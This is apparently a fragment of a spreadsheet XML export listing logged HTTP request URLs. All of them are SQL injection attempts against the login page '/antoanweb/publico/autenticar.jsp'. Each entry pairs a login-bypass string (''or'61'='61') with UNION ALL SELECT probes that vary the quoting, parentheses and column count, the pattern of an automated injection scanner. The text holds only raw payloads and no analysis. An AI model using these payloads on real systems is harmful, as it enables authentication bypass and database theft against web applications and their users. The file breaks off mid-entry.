    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('rbcb'like'rbcb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('vdcl'like'vdcl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#and(('wodi'like'wodi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#and(('tpnx'like'tpnx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#and(('msxe'like'msxe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('aqih'like'aqih&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('kkoe'like'kkoe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('jqco'like'jqco&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('owag'like'owag&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('ljgh'like'ljgh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('fnpc'like'fnpc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('jihx'like'jihx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#and((('blyp'like'blyp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#and((('drik'like'drik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#and((('zobp'like'zobp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'iomw'like'iomw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'wdvj'like'wdvj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'vuhb'like'vuhb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'uohj'like'uohj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'bcik'like'bcik&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'vysx'like'vysx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'ufcy'like'ufcy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#and'jopc'like'jopc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#and'wlcp'like'wlcp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#and'talv'like'talv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("hddw"="hddw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("ystv"="ystv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("kdma"="kdma&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("mwhz"="mwhz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("prtj"="prtj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("pqsj"="pqsj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("qxoy"="qxoy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#and("otkf"="otkf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#and("vauc"="vauc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#and("shjt"="shjt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("glxv"="glxv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("inou"="inou&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("ihbz"="ihbz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("yefq"="yefq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("qsja"="qsja&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("pqhe"="pqhe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("qkau"="qkau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#and(("gnmc"="gnmc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#and(("bgoc"="bgoc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#and(("cakl"="cakl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("ioyr"="ioyr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("jjwd"="jjwd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("iyfm"="iyfm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("qkbx"="qkbx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("gpjy"="gpjy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("mbhg"="mbhg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("rnup"="rnup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#and((("gofd"="gofd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#and((("xhdp"="xhdp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#and((("ojxv"="ojxv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"cqmc"="cqmc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"lmdq"="lmdq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"eooz"="eooz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"djgb"="djgb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"gehd"="gehd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"jevn"="jevn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"qsyt"="qsyt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#and"nhzu"="nhzu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#and"tbgr"="tbgr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#and"axbj"="axbj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("aqys"like"aqys&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("wpyy"like"wpyy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("pjas"like"pjas&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("nqad"like"nqad&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("fwmh"like"fwmh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("preg"like"preg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("ikzs"like"ikz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#and("sksw"like"sksw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#and("wkkk"like"wkkk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#and("mkii"like"mkii&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("kctm"like"kctm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("psdr"like"psdr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("sncw"like"sncw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("quel"like"quel&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("xyhi"like"xyhi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("zaal"like"zaal&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("zxcw"like"zxcw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#and(("pbnh"like"pbnh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#and(("iatn"like"iatn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#and(("uesj"like"uesj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("uklx"like"uklx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("xcak"like"xcak&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("gaff"like"gaff&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("mqec"like"mqec&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("umls"like"umls&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("zciu"like"zciu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("coxr"like"coxr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#and((("toig"like"toig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#and((("oigx"like"oigx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#and((("nsvz"like"nsvz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"zhcf"like"zhcf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"lqmf"like"lqmf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"dbyk"like"dbyk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"wjoz"like"wjoz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"miil"like"miil&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"xcgf"like"xcgf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"ajrg"like"ajrg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#and"ehnr"like"ehnr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#and"tmsz"like"tmsz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#and"qsuh"like"qsuh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3194,3194,3194,3194,3194,3194,3194,3194,3194,3194,3194,3194,3194,3194,3194,3194,3194,3194,3194,3194,3194#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5343,5343,5343,5343,5343,5343,5343,5343,5343,5343,5343,5343,5343,5343,5343,5343,5343,5343,5343,5343,5343,5343,5343#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7267,7267,7267,7267,7267,7267,7267,7267,7267,7267,7267,7267,7267,7267,7267,7267,7267,7267,7267,7267,7267,7267,7267,7267#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244,6244#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797,4797#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366,3366#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236,6236#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect123,123,123,123,123,123,123,123,123,123,123,123,123,123,123,123,123,123,123,123,123,123,123,123#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393,7393#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303,6303#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552,5552#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699,3699#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173,8173#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3970,3970,3970,3970,3970,3970,3970,3970,3970,3970,3970,3970,3970,3970,3970,3970,3970,3970,3970,3970,3970#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2797,2797,2797,2797,2797,2797,2797,2797,2797,2797,2797,2797,2797,2797,2797,2797,2797,2797,2797,2797,2797,2797#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6017,6017,6017,6017,6017,6017,6017,6017,6017,6017,6017,6017,6017,6017,6017,6017,6017,6017,6017,6017,6017,6017,6017#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469,1469#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445,2445#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162#&amp;modo=entrar</t>
  </si>
  <si>
